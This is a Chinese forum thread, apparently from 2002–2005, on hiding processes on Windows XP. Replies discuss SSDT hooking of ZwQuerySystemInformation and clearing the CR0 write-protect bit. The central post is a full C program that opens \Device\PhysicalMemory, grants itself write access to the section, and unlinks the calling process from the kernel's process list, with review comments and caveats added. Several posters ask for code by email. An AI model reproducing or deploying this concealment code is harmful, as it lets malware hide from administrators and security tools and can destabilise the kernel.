xp系统下,进程隐藏问题
我们知道,在Windows 2000下,可以通过hook一个Native api,即ZwQuerySystemInformation函数来达到进程隐藏的目的。我现在在Windows 2k下,能够很好的隐藏进程,但是发现在xp下,不能正常工作。
据我所知，XP 也使用 NT 内核，我觉得该方法应该可以在 XP 下使用，但不知道具体该改哪里（服务号？还是 SSDT 所在页面的写保护？），希望版主指点迷津。
发布于:2005-03-10 22:01
我在 XP 下实现过，和 2K 是一样的，只是在 HOOK 时要暂时去掉内存写保护——即清掉 CR0 寄存器的 WP 位（第 16 位），改完 SSDT 表项后再把它置回去——否则写 SSDT 会蓝屏。具体代码我记不得了。
发布于:2005-03-09 16:59
正在研究这方面,期待高手的指点迷津~
发布于:2005-02-22 10:22
下面这段代码是在 XP 下隐藏自身：它并不 hook ZwQuerySystemInformation，而是打开 \Device\PhysicalMemory 直接读写内核内存，把自身进程对象从内核的进程链表中摘除。怎么改一下才能隐藏别的进程？请高手指点。
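#include <windows.h>
#include <Accctrl.h>
#include <Aclapi.h>

/*
 * Hide the calling process from kernel process-list walkers on 32-bit
 * Windows XP, entirely from user mode: open the \Device\PhysicalMemory
 * section, translate kernel virtual addresses by walking the (non-PAE) page
 * tables by hand, and unlink this process's LIST_ENTRY from the kernel's
 * process list (DKOM).
 *
 * Read this before relying on it:
 *  - The caller must be able to obtain WRITE_DAC on the section (in
 *    practice: an administrator).  The DACL grant made by
 *    SetPhyscialMemorySectionCanBeWrited() is never reverted, so the section
 *    stays writable by this account afterwards.
 *  - NOTE(review): user-mode opens of \Device\PhysicalMemory are refused
 *    from XP SP2 / Server 2003 SP1 onward; expect OpenPhysicalMemory() to
 *    fail there.
 *  - Address translation assumes 32-bit non-PAE paging (4-byte PDE/PTE,
 *    page directory at physical PAGE_DIRECTORY_PHYS).  On a PAE kernel the
 *    walk returns garbage and SetData() would scribble on random memory.
 *  - The structure offsets below are build-specific; a reply in this thread
 *    reports the listing misbehaving, so verify each one against the target
 *    build (windbg: dt nt!_ETHREAD / dt nt!_EPROCESS) before use.
 *  - A partially applied unlink (first SetData() succeeds, second fails)
 *    leaves the kernel list inconsistent and nothing in user mode can undo it.
 *  - Everything casts ULONG <-> PVOID: 32-bit only.
 */

#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)

typedef LONG NTSTATUS;

typedef struct _IO_STATUS_BLOCK {
    NTSTATUS Status;
    ULONG Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;

typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

#define OBJ_INHERIT          0x00000002L
#define OBJ_PERMANENT        0x00000010L
#define OBJ_EXCLUSIVE        0x00000020L
#define OBJ_CASE_INSENSITIVE 0x00000040L
#define OBJ_OPENIF           0x00000080L
#define OBJ_OPENLINK         0x00000100L
#define OBJ_KERNEL_HANDLE    0x00000200L
#define OBJ_VALID_ATTRIBUTES 0x000003F2L

typedef struct _OBJECT_ATTRIBUTES {
    ULONG Length;
    HANDLE RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;

typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(
    OUT PHANDLE SectionHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes);

typedef VOID (CALLBACK* RTLINITUNICODESTRING)(
    IN OUT PUNICODE_STRING DestinationString,
    IN PCWSTR SourceString);

/*
 * Layout constants.  The magic numbers of the original listing, named so the
 * reader can see what must be re-verified on another build.
 */
#define PAGE_SIZE_X86          0x1000
#define PAGE_DIRECTORY_PHYS    0x30000     /* physical address of the system page directory (non-PAE) */
#define KPCR0_CURRENT_THREAD   0xFFDFF124  /* processor 0's KPCR -> PrcbData.CurrentThread (32-bit NT) */
#define ETHREAD_PROCESS_OFFSET 0x22c       /* ETHREAD field holding the owning EPROCESS -- verify per build */
#define EPROCESS_LINKS_OFFSET  0x88        /* EPROCESS LIST_ENTRY in the process list: Flink at +0, Blink at +4 -- verify per build */

RTLINITUNICODESTRING RtlInitUnicodeString = NULL;
ZWOPENSECTION ZwOpenSection = NULL;
HMODULE g_hNtDLL = NULL;            /* ntdll.dll module handle, owned by InitNTDLL/CloseNTDLL */
PVOID g_pMapPhysicalMemory = NULL;  /* read-only view of the page-directory page */
HANDLE g_hMPM = NULL;               /* \Device\PhysicalMemory section handle */

/* Release ntdll.dll and forget the resolved entry points.  Safe to call twice. */
VOID CloseNTDLL()
{
    if (g_hNtDLL != NULL) {
        FreeLibrary(g_hNtDLL);
        g_hNtDLL = NULL;
    }
    RtlInitUnicodeString = NULL;
    ZwOpenSection = NULL;
}

/*
 * Load ntdll.dll and resolve the two native entry points used below.
 * Returns TRUE on success.  The original never checked GetProcAddress(), so a
 * missing export became a NULL call inside OpenPhysicalMemory(); now it is a
 * clean FALSE with nothing left loaded.
 */
BOOL InitNTDLL()
{
    g_hNtDLL = LoadLibrary("ntdll.dll");
    if (!g_hNtDLL) {
        return FALSE;
    }
    RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress(g_hNtDLL, "RtlInitUnicodeString");
    ZwOpenSection = (ZWOPENSECTION)GetProcAddress(g_hNtDLL, "ZwOpenSection");
    if (RtlInitUnicodeString == NULL || ZwOpenSection == NULL) {
        CloseNTDLL();
        return FALSE;
    }
    return TRUE;
}

/*
 * Add a GRANT_ACCESS ACE for SECTION_MAP_WRITE to the section's DACL for the
 * calling account ("CURRENT_USER" is a trustee name SetEntriesInAcl resolves
 * itself).  hSection must have been opened with READ_CONTROL | WRITE_DAC.
 * Returns TRUE if the new DACL was applied.  The previous DACL is not saved,
 * so the grant persists for the lifetime of the object.
 *
 * Bug fixed: the original wrote `if (dwRes = Call() != ERROR_SUCCESS)`, which
 * stores the comparison result (0/1) in dwRes rather than the error code;
 * the return values are now compared directly.
 */
BOOL SetPhyscialMemorySectionCanBeWrited(HANDLE hSection)
{
    PACL pDacl = NULL;
    PACL pNewDacl = NULL;
    PSECURITY_DESCRIPTOR pSD = NULL;
    EXPLICIT_ACCESS ea;
    BOOL ok = FALSE;

    if (GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION,
                        NULL, NULL, &pDacl, NULL, &pSD) != ERROR_SUCCESS) {
        goto CleanUp;
    }

    ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
    ea.grfAccessPermissions = SECTION_MAP_WRITE;
    ea.grfAccessMode = GRANT_ACCESS;
    ea.grfInheritance = NO_INHERITANCE;
    ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;
    ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
    ea.Trustee.ptstrName = (LPTSTR)"CURRENT_USER";

    if (SetEntriesInAcl(1, &ea, pDacl, &pNewDacl) != ERROR_SUCCESS) {
        goto CleanUp;
    }
    if (SetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION,
                        NULL, NULL, pNewDacl, NULL) != ERROR_SUCCESS) {
        goto CleanUp;
    }
    ok = TRUE;

CleanUp:
    /* pDacl lives inside pSD and is released with it. */
    if (pSD) {
        LocalFree(pSD);
    }
    if (pNewDacl) {
        LocalFree(pNewDacl);
    }
    return ok;
}

/*
 * Open \Device\PhysicalMemory for read/write and map its page-directory page
 * into g_pMapPhysicalMemory.  If the first open is refused, re-open the
 * section for DAC control, grant ourselves write access, and try again.
 * Returns the section handle (also stored in g_hMPM) or NULL; on NULL no
 * handle or view is left open.  The original ignored the status of the
 * WRITE_DAC open and leaked g_hMPM when MapViewOfFile() failed.
 */
HANDLE OpenPhysicalMemory()
{
    NTSTATUS status;
    UNICODE_STRING physmemString;
    OBJECT_ATTRIBUTES attributes;

    RtlInitUnicodeString(&physmemString, L"\\Device\\PhysicalMemory");
    attributes.Length = sizeof(OBJECT_ATTRIBUTES);
    attributes.RootDirectory = NULL;
    attributes.ObjectName = &physmemString;
    attributes.Attributes = 0;
    attributes.SecurityDescriptor = NULL;
    attributes.SecurityQualityOfService = NULL;

    status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ | SECTION_MAP_WRITE, &attributes);
    if (status == STATUS_ACCESS_DENIED) {
        HANDLE hDacHandle = NULL;
        BOOL granted;

        status = ZwOpenSection(&hDacHandle, READ_CONTROL | WRITE_DAC, &attributes);
        if (!NT_SUCCESS(status)) {
            g_hMPM = NULL;
            return NULL;
        }
        granted = SetPhyscialMemorySectionCanBeWrited(hDacHandle);
        CloseHandle(hDacHandle);
        if (!granted) {
            g_hMPM = NULL;
            return NULL;
        }
        status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ | SECTION_MAP_WRITE, &attributes);
    }
    if (!NT_SUCCESS(status)) {
        g_hMPM = NULL;
        return NULL;
    }

    /* The page directory is only ever read here; the original passed the bare 4 (== FILE_MAP_READ). */
    g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, FILE_MAP_READ, 0, PAGE_DIRECTORY_PHYS, PAGE_SIZE_X86);
    if (g_pMapPhysicalMemory == NULL) {
        CloseHandle(g_hMPM);
        g_hMPM = NULL;
        return NULL;
    }
    return g_hMPM;
}

/*
 * Translate the virtual address addr to a physical address using the page
 * directory mapped at BaseAddress (non-PAE: 1024 x 4-byte PDEs, 4 KB or 4 MB
 * pages).  Returns 0 when the address is not present or the page table could
 * not be mapped.  0 is also a legal physical address, so callers treat it as
 * "unusable", which is the right call for kernel structures anyway.
 *
 * Bug fixed: the original never unmapped the page-table view on the
 * "PTE not present" path and dereferenced a NULL view if MapViewOfFile()
 * failed.
 */
PVOID LinearToPhys(PULONG BaseAddress, PVOID addr)
{
    ULONG vaddr = (ULONG)addr;
    ULONG pde = BaseAddress[vaddr >> 22];
    PULONG pageTable;
    ULONG pte;

    if ((pde & 1) == 0) {
        return 0;   /* directory entry not present */
    }
    if (pde & 0x00000080) {
        /* PS bit set: 4 MB page, the PDE holds the frame directly. */
        return (PVOID)((pde & 0xFFC00000) + (vaddr & 0x003FFFFF));
    }

    pageTable = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ, 0, pde & 0xFFFFF000, PAGE_SIZE_X86);
    if (pageTable == NULL) {
        return 0;
    }
    pte = pageTable[(vaddr & 0x003FF000) >> 12];
    UnmapViewOfFile(pageTable);

    if ((pte & 1) == 0) {
        return 0;   /* page not present */
    }
    return (PVOID)((pte & 0xFFFFF000) + (vaddr & 0x00000FFF));
}

/*
 * Read the 32-bit word at kernel virtual address addr through the physical
 * memory section.  Returns FALSE (and leaves *value untouched) if the address
 * is not mapped or the page could not be viewed.  Separate from GetData()
 * because a 0 return value there cannot be told apart from failure.
 */
static BOOL ReadKernelUlong(PVOID addr, PULONG value)
{
    ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, addr);
    PULONG view;

    if (phys == 0) {
        return FALSE;   /* the original fell through and read physical page 0 */
    }
    view = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ, 0, phys & 0xFFFFF000, PAGE_SIZE_X86);
    if (view == NULL) {
        return FALSE;
    }
    *value = view[(phys & 0xFFF) >> 2];
    UnmapViewOfFile(view);
    return TRUE;
}

/* Read the ULONG at kernel virtual address addr; 0 on failure (ambiguous with a real 0). */
ULONG GetData(PVOID addr)
{
    ULONG value = 0;
    return ReadKernelUlong(addr, &value) ? value : 0;
}

/*
 * Write data to the ULONG at kernel virtual address addr.  Returns FALSE if
 * the address is not mapped or the page could not be viewed for writing.
 *
 * Bug fixed: when LinearToPhys() failed the original masked the 0 result and
 * wrote into physical page 0 instead of reporting an error.
 */
BOOL SetData(PVOID addr, ULONG data)
{
    ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, addr);
    PULONG view;

    if (phys == 0) {
        return FALSE;
    }
    view = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xFFFFF000, PAGE_SIZE_X86);
    if (view == NULL) {
        return FALSE;
    }
    view[(phys & 0xFFF) >> 2] = data;
    UnmapViewOfFile(view);
    return TRUE;
}

/*
 * Unlink the calling process from the kernel's process list.
 *
 * Steps: current ETHREAD from CPU 0's KPCR -> owning EPROCESS -> its
 * LIST_ENTRY {Flink, Blink}; then make the neighbours point past us
 * (Flink->Blink = Blink, Blink->Flink = Flink) and finally point our own
 * entry at itself, so that when the kernel later removes this entry (process
 * exit) it touches only our own memory and not neighbours that may have
 * exited and been freed in the meantime.
 *
 * Returns TRUE only if every read and write succeeded; the original returned
 * TRUE even when InitNTDLL() failed.  All handles and views are released on
 * every path.
 *
 * Multiprocessor caveat: KPCR0_CURRENT_THREAD is processor 0's KPCR.  On an
 * SMP machine the calling thread may be running on another CPU, in which case
 * that word names some other thread and a different process gets unlinked.
 * Pinning the thread to CPU 0 for the duration guarantees the word is ours,
 * because the read itself is executed by this thread on CPU 0.
 */
BOOL HideProcessAtAll()
{
    BOOL ok = FALSE;
    DWORD_PTR oldAffinity;
    ULONG thread = 0, process = 0, fw = 0, bw = 0;

    if (!InitNTDLL()) {
        return FALSE;
    }
    if (OpenPhysicalMemory() == NULL) {
        CloseNTDLL();
        return FALSE;
    }

    oldAffinity = SetThreadAffinityMask(GetCurrentThread(), 1);

    if (ReadKernelUlong((PVOID)KPCR0_CURRENT_THREAD, &thread) &&
        ReadKernelUlong((PVOID)(thread + ETHREAD_PROCESS_OFFSET), &process) &&
        ReadKernelUlong((PVOID)(process + EPROCESS_LINKS_OFFSET), &fw) &&
        ReadKernelUlong((PVOID)(process + EPROCESS_LINKS_OFFSET + 4), &bw)) {
        ULONG self = process + EPROCESS_LINKS_OFFSET;

        ok = SetData((PVOID)(fw + 4), bw) &&   /* next->Blink = our Blink */
             SetData((PVOID)bw, fw);           /* prev->Flink = our Flink */
        if (ok) {
            ok = SetData((PVOID)self, self) && /* our Flink = self */
                 SetData((PVOID)(self + 4), self); /* our Blink = self */
        }
    }

    if (oldAffinity != 0) {
        SetThreadAffinityMask(GetCurrentThread(), oldAffinity);
    }
    UnmapViewOfFile(g_pMapPhysicalMemory);
    g_pMapPhysicalMemory = NULL;
    CloseHandle(g_hMPM);
    g_hMPM = NULL;
    CloseNTDLL();
    return ok;
}

int main()
{
    /* Exit status now reflects success; the original always returned 0. */
    return HideProcessAtAll() ? 0 : 1;
}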
发布于:2005-01-07 23:52
给大家一个公用版本！执行后的结果如下（原帖附的截图未能保留），好像是有问题。
发布于:2005-01-07 15:43
发布于:2005-01-03 19:05
好功能
程序员必学 |
发布于:2005-01-01 10:50
偶也想要一个研究,可以吗:)?
hongsing@163.com |
发布于:2004-12-31 23:59
我也碰到这个问题,能给我发一个吗?
poenir@sohu.com |
发布于:2004-12-10 10:19
顶!
发布于:2004-12-09 09:56
XP下实现了么?我也遇到这个问题,帮帮忙啊!
发布于:2003-06-19 09:59
你的问题估计是 XP 的系统服务号和 2K 的不一样，应改成 `OldZwQuerySystemInformation = (PZwQuerySystemInformation)(*(((PServiceDescriptorTableEntry)KeServiceDescriptorTable)->ServiceTableBase + 0xAD));`。注意 0xAD 只对应 XP 这一个版本的内核，硬编码服务号换到别的版本就会替换错表项；更稳妥的做法是运行时从 ntdll 中 ZwQuerySystemInformation 的存根（`mov eax, 服务号`）里读出这个号。另外 XP 的 SSDT 所在页面是只读的，改表项前要先去掉写保护（见楼上）。
发布于:2003-02-16 14:08
我自己都没了呢,5555
发布于:2003-02-16 12:52
哪位大虾可以把2000下的实现代码贴出来,或者发给我,谢谢
smhp@163.net |
发布于:2002-11-09 22:11
[quote]请查看email,我用163发的,不知道要躲久 收到,谢谢。 如果你缺分,我可以开帖子给你分。 [/quote] 花猫大侠,能把这份代码给我邮一份吗? 我的EMAIL: horsedo@sina.com 如果你缺分,我也可以开帖子给你分 :D |
发布于:2002-10-14 11:15
现在还不缺,等缺的时候在抱着你的脚 不错,9X下hook了ToolHelp32,给我一些启发,启发……………… 呵呵,再次谢谢你。 |
发布于:2002-10-14 11:10
现在还不缺,等缺的时候在抱着你的脚
发布于:2002-10-14 11:08
请查看 email，我用 163 发的，不知道要多久。——收到，谢谢。如果你缺分，我可以开帖子给你分。
发布于:2002-10-14 11:04
请查看 email，我用 163 发的，不知道要多久。
发布于:2002-10-14 11:00
怎么给你？——发到我签名里的信箱 cvcmaster@etang.com。我也不喜欢 9X，但我希望我的东西在所有 Win32 平台上都能跑。你是说 9X 下用那个 RegisterServiceProcess？那个似乎只能在任务列表里隐藏，但据说用别的进程枚举方式查看还是能看到，我没实验过。